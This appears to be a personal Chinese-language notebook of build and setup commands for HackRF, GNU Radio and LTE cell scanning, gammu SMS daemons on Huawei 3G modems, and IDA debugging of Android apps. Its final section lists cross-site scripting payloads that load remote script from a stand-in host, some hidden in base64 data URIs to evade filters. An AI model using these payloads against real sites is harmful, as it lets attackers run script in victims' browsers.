hackrf-LTE

0x00

代码地址:https://github.com/JiaoXianjun/LTE-Cell-Scanner

0x01

#mkdir build
#cd build
#cmake ../ -- default for rtlsdr and OpenCL ON; OR
#cmake ../ -DUSE_BLADERF=1 -- build for bladeRF; OR
#cmake ../ -DUSE_HACKRF=1 -- build for hackRF
#cmake ../ -DUSE_OPENCL=0 -- disable OpenCL (See notes in later chapter)
#make
#make install

0x02

CMake Error at cmake/Modules/FindITPP.cmake:63 (MESSAGE):Could not find ITPP library

#apt install libitpp-dev

A required library with BLAS API not found. Please specify library location.

#apt install libblas-dev liblapack-dev

0x03

 

#CellSearch --freq-start 1890000000

HackRF基础

一、UHD
安装依赖

#apt-get install libboost-all-dev -y
#apt-get install libusb-1.0-0-dev -y
#apt-get install python-mako -y
#apt-get install doxygen -y
#apt-get install python-docutils -y
#apt-get install cmake -y
#apt-get install build-essential -y

安装git

#apt install git -y

#git clone --recursive git://github.com/EttusResearch/uhd.git

编译

#cd uhd/host

#mkdir build

#cd build

#cmake ../

#make

#make install

设置库路径

#ldconfig

二、HackRF

#apt-get install build-essential cmake libusb-1.0-0-dev pkg-config

#git clone --progress http://github.com/mossmann/hackrf.git

#cd hackrf/host

#mkdir build

#cd build

#cmake ../ -DINSTALL_UDEV_RULES=ON //注释:这条语句的意思是开启hackrf 识别权限

#make

#make install

#ldconfig

#hackrf_info

备注
cmake ../ -DINSTALL_UDEV_RULES=ON 出现
Could NOT find FFTW (missing: FFTW_LIBRARIES FFTW_INCLUDES)

#apt-get install libfftw3-dev libwxgtk3.0-dev

 

三、RadioGNU

#apt-get -y install git-core cmake g++ python-dev swig pkg-config libfftw3-dev libboost-all-dev libcppunit-dev libgsl0-dev libusb-dev libsdl1.2-dev python-wxgtk3.0 python-numpy python-cheetah python-lxml doxygen libxi-dev python-sip libqt4-opengl-dev libqwt-dev libfontconfig1-dev libxrender-dev python-sip python-sip-dev

libboost1.62-dev

#apt-get install gnuradio

#gnuradio-companion

四、gr-osmosdr

#git clone git://git.osmocom.org/gr-osmosdr

#mkdir build

#cd build

#cmake ../

#make

#make install

#ldconfig

五、Gqrx

#apt-get purge --auto-remove gqrx
#apt-get purge --auto-remove gqrx-sdr
#add-apt-repository -y ppa:bladerf/bladerf
#add-apt-repository -y ppa:ettusresearch/uhd
#add-apt-repository -y ppa:myriadrf/drivers
#add-apt-repository -y ppa:myriadrf/gnuradio
#add-apt-repository -y ppa:gqrx/gqrx-sdr
#apt-get update
#apt-get install gqrx-sdr
#gqrx

CentOS-huawei 3g

0x00

#yum install usbutils

#lsusb

Bus 001 Device 002: ID 12d1:1446 Huawei Technologies Co., Ltd. Broadband stick (modem on)

安装libusb
configure: error: “udev support requested but libudev not installed”
#yum install libusb1-devel
##yum install libgudev1.x86_64
##yum install libgudev1-devel

#./configure --disable-udev

usb-modeswitch

#make && make install

usb-modeswitch-data

#make install
#vim /lib/udev/rules.d/40-usb_modeswitch.rules

末尾添加ATTR{idVendor}==”12d1″, ATTR{idProduct}==”1f01″, RUN+=”usb_modeswitch ‘%b/%k'”

#dmesg | grep tty

0x01

#wvdial

 

[Dialer Defaults]
Init1 = ATZ
Init2 = ATQ0 V1 E1 S0=0 &C1 &D2
Init3 = AT+CGDCONT=1,"IP","airtelgprs.com"
stupid mode = 1
Modem Type = USB Modem
Baud = 460800
New PPPD = yes
Modem = /dev/ttyUSB0
ISDN = 0
Phone = *99#
Carrier Check = no
Password = airtel
Username = airtel
FlowControl=Hardware(CRTSCTS)

 

#yum install wvdial
#wvdialconf

Found a modem on /dev/ttyUSB0

cmake

#./configure
#gmake
#gmake install

 

gammu-config

#vim /usr/local/bin/gammu-config

gammu: error while loading shared libraries: libGammu.so.8: cannot open shared object file: No such file or directory

ln -s /usr/local/lib64/libGammu.so /usr/lib64/libGammu.so.8
ln -s /usr/local/lib64/libgsmsd.so /usr/lib64/libgsmsd.so.8

0x02

#echo "20170916sms test" |gammu sendsms TEXT 13912345678
#gammu getallsms

0x03

#vim /etc/gammu-smsdrc
# Gammu library configuration, see gammurc(5)
[gammu]
# Please configure this!
port = /dev/ttyUSB0
connection = at
# Debugging
#logformat = textall

# SMSD configuration, see gammu-smsdrc(5)
[smsd]
RunOnReceive = /root/sms/smsutil.py
service = sql
driver = native_mysql
logfile = /var/log/gammu-smsd
host = localhost
pc = localhost
user = root
password = password

database = smsd
# Increase for debugging information
debuglevel = 0
ReceiveFrequency = 60
PIN = 1234

mysql

GRANT USAGE ON *.* TO 'smsd'@'localhost' IDENTIFIED BY 'password';

GRANT SELECT, INSERT, UPDATE, DELETE ON `smsd`.* TO 'smsd'@'localhost';

CREATE DATABASE smsd;

phpMyAdmin
docs/sql/mysql.sql

0x04

#gammu-smsd --config /etc/gammu-smsdrc --pid /var/run/gammu-smsd.pid --daemon --user gamm

 

pi-huawei 3g sms

0x00

树莓派固定IP

#vim /etc/network/interfaces
allow-hotplug wlan0
iface wlan0 inet static
wpa-ssid ssid
wpa-psk psk
address 192.168.1.120
netmask 255.255.255.0
gateway 192.168.1.1

重启网卡

#/etc/init.d/networking restart

0x01

#apt-get install gammu

#apt-get install gammu-smsd
#dmesg | grep tty

gammu-config

#gammu getallsms

0x02

#vim /etc/gammu-smsdrc
# Configuration file for Gammu SMS Daemon

[gammu]
port = /dev/ttyUSB0
connection = at

[smsd]
service = files

logfile = /var/spool/gammu/log

debuglevel = 2

commtimeout = 1
sendtimeout = 15
statusfrequency = 0

outboxformat = unicode
transmitformat = unicode

RunOnReceive = /var/spool/gammu/forward.sh

inboxpath = /var/spool/gammu/inbox/
outboxpath = /var/spool/gammu/outbox/
sentsmspath = /var/spool/gammu/sent/
errorsmspath = /var/spool/gammu/error/

 

#vim /var/spool/gammu/forward.sh
#!/bin/bash

SMS_MESSAGES=1

for i in `seq $SMS_MESSAGES`
do
number="SMS_${i}_NUMBER"
text="SMS_${i}_TEXT"
eval "gammu-smsd-inject TEXT my_number_goes_here -text \"${!number}: ${!text}\""
num=`eval echo '$'"$number"`
txt=`eval echo '$'"$text"`
echo -e "Phone:$num\nContent:$txt" |mail -s "$num" 1000@qq.com
done

0x03

#apt-get install msmtp

#apt-get install mutt
#vim .msmtprc

account default
host smtp.163.com
from qq@163.com
auth plain
user qq@163.com
password password
logfile /var/log/msmtp.log
#vim .muttrc
set sendmail="/usr/bin/msmtp"
set use_from=yes
set realname="qq"
set editor="vim"
#echo "this is test mail" |mutt -s "test20170916" 100@qq.com

0x04

#gammu-smsd --config /etc/gammu-smsdrc --pid /var/run/gammu-smsd.pid --daemon --user gamm

 

IDA动态调试android dex

0x00

推送android_server到android手机:

#adb push D:\Documents\share\IDA\dbgsrv\android_server /data/local/tmp/android_server

设置777权限:

#cd /data/local/tmp/

#chmod 777 android_server

启动该文件:

#./android_server

新开个cmd窗口,进行端口转发:

#adb forward tcp:23946 tcp:23946

启动所要调试的activity:

#adb shell am start -D -n com.a.a/.MainActivity

0x01

启动ida pro

“Debugger -process options”:

#”Debugger – > Attach -> Remote ArmLinux/Androiddebugger”:

#Hostname->localhost

“Debug options”:

在弹出的窗口中选择你要调试的进程,搜索dex。

 

F9执行 F2下断点

 

注意:如果运行过程中一直显示下图所示窗口,就需要关注一下手机上的屏幕界面,看是否是需要与用户进行交互了。

xss远程调用

0x00

<script src='http://www.a.com/a.js'></script>

0x01

<img src=x onerror=document.body.appendChild(document.createElement('script')).src='http://www.a.com/a.js'>

0x02

base64

<script src=http://www.a.com/a.js></script>对应的base64:PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg==

<object data="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg=="></object>
<iframe src="data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovL3d3dy5hLmNvbS9hLmpzPjwvc2NyaXB0Pg=="></iframe>